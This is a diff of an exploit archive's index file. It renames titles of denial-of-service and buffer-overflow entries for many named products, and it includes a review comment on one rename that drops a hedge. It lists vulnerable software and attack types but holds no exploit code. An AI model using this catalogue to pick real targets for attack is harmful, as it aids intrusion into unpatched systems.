 2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0
 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0
-2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Request Remote Denial of Service",2006-11-04,CorryL,windows,dos,0
+2716,platforms/windows/dos/2716.pl,"Essentia Web Server 2.15 - GET Remote Denial of Service",2006-11-04,CorryL,windows,dos,0
 2730,platforms/linux/dos/2730.pm,"OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)",2006-11-06,"Evgeny Legerov",linux,dos,0
 2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 - (APPE) Remote Buffer Overflow (PoC)",2006-11-07,"Joxean Koret",windows,dos,0
 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service",2006-11-07,"Joxean Koret",windows,dos,0
@@ -544,7 +544,7 @@ id,file,description,date,author,platform,type,port
 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0
 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0
 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0
-3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 - POST Request Denial of Service",2007-04-12,shinnai,windows,dos,0
+3715,platforms/windows/dos/3715.py,"Sami HTTP Server 2.0.1 - POST Denial of Service",2007-04-12,shinnai,windows,dos,0
 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service",2007-04-13,evilrabbi,multiple,dos,0
 3768,platforms/windows/dos/3768.pl,"Winamp 5.3 - '.wmv' Remote Denial of Service",2007-04-19,WiLdBoY,windows,dos,0
 3769,platforms/linux/dos/3769.c,"eXtremail 2.1.1 - DNS Parsing Bugs Remote (PoC)",2007-04-20,mu-b,linux,dos,0
@@ -613,7 +613,7 @@ id,file,description,date,author,platform,type,port
 4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0
 4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 (Windows Release) - Remote Denial of Service",2007-07-20,"YAG KOHHA",windows,dos,0
 4215,platforms/windows/dos/4215.pl,"Microsoft Windows Explorer - '.GIF' Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0
-4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - Post Request Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0
+4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - POST Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0
 4227,platforms/windows/dos/4227.php,"PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash",2007-07-31,tenkei_ev,multiple,dos,0
 4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 - DirectX Media Remote Overflow Denial of Service",2007-07-31,DeltahackingTEAM,windows,dos,0
@@ -988,7 +988,7 @@ id,file,description,date,author,platform,type,port
 8325,platforms/windows/dos/8325.py,"Apple Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash",2009-03-31,"Ahmed Obied",windows,dos,0
 8333,platforms/multiple/dos/8333.txt,"Sun Calendar Express Web Server - (Denial of Service / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-03-31,"Core Security",multiple,dos,0
 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) (PoC)",2009-04-01,"fl0 fl0w",windows,dos,0
-8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC)",2009-04-01,n00b,multiple,dos,0
+8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - GET Multiple Remote Buffer Overflow (PoC)",2009-04-01,n00b,multiple,dos,0
 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0
 8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0
 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 - XHTML Parser Remote Buffer Overflow (PoC)",2009-04-06,cicatriz,windows,dos,0
@@ -1057,8 +1057,8 @@ id,file,description,date,author,platform,type,port
 8695,platforms/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",multiple,dos,0
 8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0
 8720,platforms/multiple/dos/8720.c,"OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos,0
-8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0
-8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - GET Request Remote Denial of Service",2009-05-18,Stack,windows,dos,0
+8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - GET Remote Buffer Overflow (PoC)",2009-05-18,Stack,windows,dos,0
+8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 - GET Remote Denial of Service",2009-05-18,Stack,windows,dos,0
 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)",2009-05-22,n00b,windows,dos,0
 8777,platforms/windows/dos/8777.txt,"Soulseek 157 NS x/156.x - Remote Distributed Search Code Execution",2009-05-26,"laurent gaffié",windows,dos,0
 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox - (unclamped loop) Denial of Service",2009-05-26,"Thierry Zoller",multiple,dos,0
@@ -1085,7 +1085,7 @@ id,file,description,date,author,platform,type,port
 9029,platforms/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)",2009-06-29,Trancer,windows,dos,0
 9033,platforms/windows/dos/9033.pl,"SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)",2009-06-29,hack4love,windows,dos,0
 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - '.m3u' Local Buffer Overflow (PoC)",2009-07-01,"ThE g0bL!N",windows,dos,0
-9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service",2009-07-01,Stack,hardware,dos,0
+9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Remote Denial of Service",2009-07-01,Stack,hardware,dos,0
 9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x - JavaScript Reload Remote Crash",2009-07-02,SkyOut,multiple,dos,0
 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié",windows,dos,0
 9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)",2009-07-09,kingcope,multiple,dos,0
@@ -1190,7 +1190,7 @@ id,file,description,date,author,platform,type,port
 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0
 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos,0
 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos,0
-9621,platforms/windows/dos/9621.txt,"Kolibri+ Web Server 2 - GET Request Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0
+9621,platforms/windows/dos/9621.txt,"Kolibri+ Web Server 2 - GET Denial of Service",2009-09-10,"Usman Saeed",windows,dos,0
 9622,platforms/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - (LIST command) Format String Denial of Service",2009-09-10,corelanc0d3r,windows,dos,0
 9626,platforms/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - '.mid' Integer Overflow (PoC)",2009-09-10,Dr_IDE,windows,dos,0
 9642,platforms/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812
@@ -1581,7 +1581,7 @@ id,file,description,date,author,platform,type,port
 15498,platforms/multiple/dos/15498.html,"Mozilla Firefox 3.6.12 - Remote Denial of Service",2010-11-12,"emgent white_sheep and scox",multiple,dos,0
 13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPD - Remote Exploit (PoC)",2010-06-08,"Dillon Beresford",hardware,dos,80
 13775,platforms/hardware/dos/13775.pl,"Motorola SB5101 - Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford",hardware,dos,80
-13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - '.INDD' File Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0
+13817,platforms/windows/dos/13817.pl,"Adobe InDesign CS3 - '.INDD' Handling Buffer Overflow",2010-06-11,LiquidWorm,windows,dos,0
 13823,platforms/hardware/dos/13823.txt,"Savy Soda Documents - Mobile Office Suite '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0
 13824,platforms/hardware/dos/13824.txt,"Office^2 iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0
 13825,platforms/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",hardware,dos,0
@@ -1785,7 +1785,7 @@ id,file,description,date,author,platform,type,port
 15418,platforms/windows/dos/15418.html,"Microsoft Internet Explorer - Memory Corruption",2010-11-04,Unknown,windows,dos,0
 15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption",2010-11-04,scup,windows,dos,0
 15420,platforms/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local Denial of Service (PoC)",2010-11-04,"Nikita Tarakanov",windows,dos,0
-15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Request Denial of Service",2010-11-05,wingthor,windows,dos,0
+15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 - GET Denial of Service",2010-11-05,wingthor,windows,dos,0
 15428,platforms/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0
 15429,platforms/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos,0
 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0
@@ -2353,7 +2353,7 @@ id,file,description,date,author,platform,type,port
 19777,platforms/windows/dos/19777.txt,"Microsoft Internet Explorer 9 / SharePoint / Lync - toStaticHTML HTML Sanitizing Bypass (MS12-037/MS12-039/MS12-050)",2012-07-12,"Adi Cohen",windows,dos,0
 19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - Denial of Service",2000-02-26,"Jeff Stevens",multiple,dos,0
 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - Denial of Service",2000-02-28,"Jon Hittner",windows,dos,0
-19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request",1999-08-25,"ISS X-Force",windows,dos,0
+19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Exploit",1999-08-25,"ISS X-Force",windows,dos,0
 19799,platforms/windows/dos/19799.txt,"Microsoft Windows Server 2000/95/98/ME/NT 3.5.x/Enterprise Server 4.0/Terminal Server 4.0/Workstation 4.0 Microsoft DoS Device Name - Denial of Service",2000-03-04,anonymous,windows,dos,0
 19806,platforms/windows/dos/19806.c,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (1)",2000-03-14,"Ussr Labs",windows,dos,0
 19807,platforms/windows/dos/19807.txt,"Atrium Software Mercur Mail Server 3.2 - Multiple Buffer Overflows (2)",2000-03-14,"Ussr Labs",windows,dos,0
@@ -2480,7 +2480,7 @@ id,file,description,date,author,platform,type,port
 20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 - AfpaCache/WebSphereNet.Data Denial of Service",2001-01-08,"Peter Grundl",multiple,dos,0
 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0
 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0
-20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0
+20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0
 20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0
 20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0
 20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0
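Review bot: The new title for entry 20535 drops the word "Potential" and now reads `(Linux Kernel) ReiserFS 3.5.28 - Code Execution / Denial of Service`, which presents code execution as established, while the row still sits under `platforms/linux/dos/` with type `dos`. Unlike the other renames in this commit, which only strip words such as "Request" or "Long", this one changes what the title claims. Anyone triaging exposure from the index title alone would rank this entry higher than the original wording supported. If the referenced report only suggests code execution, keep the qualifier, e.g. `"(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service"`, or state in the commit message that hedging words are being retired as a naming convention.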
@@ -2622,7 +2622,7 @@ id,file,description,date,author,platform,type,port
 21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6 / Outlook 2000/2002/5.5 / Word 2000/2002 - VBScript ActiveX Word Object Denial of Service",2002-04-08,"Elia Florio",windows,dos,0
 21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 - Denial of Service Device Denial of Service",2002-04-24,ERRor,windows,dos,0
 21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - '/yell' Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0
-21387,platforms/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d - GET Request Buffer Overflow",2002-04-17,"Mark Litchfield",windows,dos,0
+21387,platforms/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d - GET Buffer Overflow",2002-04-17,"Mark Litchfield",windows,dos,0
 21388,platforms/windows/dos/21388.c,"Microsoft Windows Server 2000 - Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",windows,dos,0
 21389,platforms/windows/dos/21389.txt,"Microsoft Windows Server 2000 - Lanman Denial of Service (2)",2003-01-03,ch0wn,windows,dos,0
 21404,platforms/windows/dos/21404.htm,"Microsoft Internet Explorer 5/6 - Self-Referential Object Denial of Service",2002-04-20,"Matthew Murphy",windows,dos,0
@@ -2661,7 +2661,7 @@ id,file,description,date,author,platform,type,port
 21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier",2002-07-03,"Auriemma Luigi",multiple,dos,0
 21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,windows,dos,0
 21598,platforms/linux/dos/21598.c,"Linux Kernel 2.4.18/2.4.19 - Privileged File Descriptor Resource Exhaustion",2002-07-08,"Paul Starzetz",linux,dos,0
-21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Request Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0
+21600,platforms/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Denial of Service",2002-07-08,"Matthew Murphy",windows,dos,0
 21612,platforms/windows/dos/21612.txt,"Ultrafunk Popcorn 1.20 - Multiple Denial of Service Vulnerabilities",2002-07-11,"Auriemma Luigi",windows,dos,0
 21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin - Denial of Service",2002-07-16,"Lucas Lundgren",cgi,dos,0
 21632,platforms/unix/dos/21632.c,"PHP Interpreter 3.0.x/4.0.x/4.1/4.2 - Direct Invocation Denial of Service",2002-07-22,"Matthew Murphy",unix,dos,0
@@ -2690,7 +2690,7 @@ id,file,description,date,author,platform,type,port
 21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link - Denial of Service",2002-09-09,"Stefano Zanero",windows,dos,0
 21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch - Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos,0
 21792,platforms/windows/dos/21792.txt,"Savant Web Server 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",windows,dos,0
-21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 - Long GET Request Buffer Overflow",2002-09-16,UkR-XblP,windows,dos,0
+21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 - GET Buffer Overflow",2002-09-16,UkR-XblP,windows,dos,0
 21813,platforms/windows/dos/21813.c,"Trillian 0.73/0.74 - IRC JOIN Buffer Overflow",2002-09-20,"Lance Fitz-Herbert",windows,dos,0
 21816,platforms/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 - IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",windows,dos,0
 21819,platforms/windows/dos/21819.c,"Trillian 0.74 - IRC Raw Messages Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0
@@ -2708,7 +2708,7 @@ id,file,description,date,author,platform,type,port
 21911,platforms/multiple/dos/21911.txt,"Oracle 9i Application Server 9.0.2 Web Cache Administration Tool - Denial of Service",2002-10-06,@stake,multiple,dos,0
 21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block Denial of Service",2002-10-08,"Yiming Gong",windows,dos,0
 33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta",windows,dos,0
-21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0
+21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - GET Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0
 21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebserver 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos,0
 21939,platforms/hardware/dos/21939.txt,"Polycom ViaVideo 2.2/3.0 - Denial of Service",2002-10-15,prophecy.net.nz,hardware,dos,0
 21941,platforms/windows/dos/21941.txt,"Polycom 2.2/3.0 - ViaVideo Buffer Overflow",2002-10-15,prophecy.net.nz,windows,dos,0
@@ -2725,7 +2725,7 @@ id,file,description,date,author,platform,type,port
 21973,platforms/windows/dos/21973.pl,"SmartMail Server 1.0 Beta 10 - Oversized Request Denial of Service",2002-10-31,"securma massine",windows,dos,0
 21975,platforms/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x - Gozila.cgi Denial of Service",2002-11-01,"Jeep 94",hardware,dos,0
 21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4 / D-Link DI-804 4.68/Dl-704 2.56 b5 - Embedded HTTP Server Denial of Service",2002-11-01,"Mark Litchfield",hardware,dos,0
-21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Request Denial of Service",2002-11-02,anonymous,windows,dos,0
+21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service",2002-11-02,anonymous,windows,dos,0
 21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0
 21984,platforms/unix/dos/21984.c,"QNX 6.1 - TimeCreate Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0
 21985,platforms/linux/dos/21985.txt,"Pine 4.x - From: Field Heap Corruption",2002-11-07,lsjoberg,linux,dos,0
@@ -2742,7 +2742,7 @@ id,file,description,date,author,platform,type,port
 22059,platforms/linux/dos/22059.pl,"Pserv 2.0 - HTTP Request Parsing Buffer Overflow",2002-11-01,"Matthew Murphy",linux,dos,0
 22060,platforms/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",hardware,dos,0
 22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0
-22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
+22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
 22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
@@ -2808,7 +2808,7 @@ id,file,description,date,author,platform,type,port
 22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",windows,dos,0
 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC)",2012-11-01,coolkaveh,windows,dos,0
 22406,platforms/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",linux,dos,0
-22407,platforms/hardware/dos/22407.txt,"Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0
+22407,platforms/hardware/dos/22407.txt,"NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",hardware,dos,0
 22415,platforms/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",hardware,dos,0
 22417,platforms/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",windows,dos,0
 22419,platforms/php/dos/22419.php,"PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow",2003-03-25,"Sir Mordred",php,dos,0
@@ -2835,7 +2835,7 @@ id,file,description,date,author,platform,type,port
 22516,platforms/windows/dos/22516.pl,"Xeneo Web Server 2.2.9 - Denial of Service",2003-04-21,badpack3t,windows,dos,0
 22518,platforms/windows/dos/22518.html,"Microsoft 'Shlwapi.dll' 6.0.2800.1106 - Malformed HTML Form Tag Denial of Service",2003-04-22,"Ramon Pinuaga Cascales",windows,dos,0
 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos,0
-22535,platforms/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - Multiple GET Request Denial of Service",2003-04-24,"Positive Technologies",multiple,dos,0
+22535,platforms/multiple/dos/22535.txt,"VisNetic ActiveDefense 1.3.1 - GET Multiple Denial of Service",2003-04-24,"Positive Technologies",multiple,dos,0
 22536,platforms/multiple/dos/22536.txt,"Opera 7.10 - Permanent Denial of Service",2003-04-24,"David F. Madrid",multiple,dos,0
 22537,platforms/linux/dos/22537.c,"Libopt.a 3.1x - Error Logging Buffer Overflow (1)",2003-04-24,kf,linux,dos,0
 22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos,0
@@ -2851,12 +2851,12 @@ id,file,description,date,author,platform,type,port
 22582,platforms/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - RCPT TO Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0
 22585,platforms/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (1)",2003-05-11,"Matthew Murphy",windows,dos,0
 22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0
-22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0
+22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - GET Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0
 22591,platforms/windows/dos/22591.txt,"Microsoft Excel 2007 - WriteAV Crash (PoC)",2012-11-09,coolkaveh,windows,dos,0
 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0
 22602,platforms/palm_os/dos/22602.c,"PalmOS 3/4 - ICMP Flood Remote Denial of Service",2003-05-14,"Shaun Colley",palm_os,dos,0
 22608,platforms/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 - Malformed HTTP Request Denial of Service",2003-05-16,euronymous,windows,dos,0
-22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow",2003-05-16,euronymous,windows,dos,0
+22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - GET Buffer Overflow",2003-05-16,euronymous,windows,dos,0
 22619,platforms/linux/dos/22619.txt,"CUPS 1.1.x - Cupsd Request Method Denial of Service",2003-05-20,"Phil D'Amore",linux,dos,0
 22621,platforms/windows/dos/22621.txt,"Microsoft NetMeeting 2.1/3.0.1 4.4.3385 - CALLTO URL Buffer Overflow",2003-05-20,"David F. Madrid",windows,dos,0
 22624,platforms/linux/dos/22624.c,"BZFlag 1.7 g0 - Reconnect Denial of Service",2003-05-21,"russian code molester",linux,dos,0
@@ -2887,14 +2887,14 @@ id,file,description,date,author,platform,type,port 22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 - SortName Buffer Overflow",2003-06-02,posidron,windows,dos,0 22739,platforms/hardware/dos/22739.py,"Broadcom BCM4325 and BCM4329 Devices - Denial of Service",2012-11-15,CoreLabs,hardware,dos,0 22749,platforms/novell/dos/22749.txt,"Novell Netware 6.0 / eDirectory 8.7 - HTTPSTK.NLM Remote Abend",2003-06-06,"Cheese Head",novell,dos,0 -22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - Multiple GET Requests Denial of Service",2003-06-11,posidron,windows,dos,0 -22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Request Denial of Service",2003-06-12,"Ziv Kamir",windows,dos,0 +22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service",2003-06-11,posidron,windows,dos,0 +22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Denial of Service",2003-06-12,"Ziv Kamir",windows,dos,0 22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 - Signal Handling Denial of Service",2003-06-14,LynX,windows,dos,0 22780,platforms/windows/dos/22780.txt,"Mailtraq 2.1.0.1302 - Remote Format String SMTP Resource Consumption",2003-06-16,"Noam Rathaus",windows,dos,0 22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote 'Username' Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 22790,platforms/windows/dos/22790.txt,"GuildFTPd 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 -22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - Long GET Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0 +22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - GET Remote Denial of 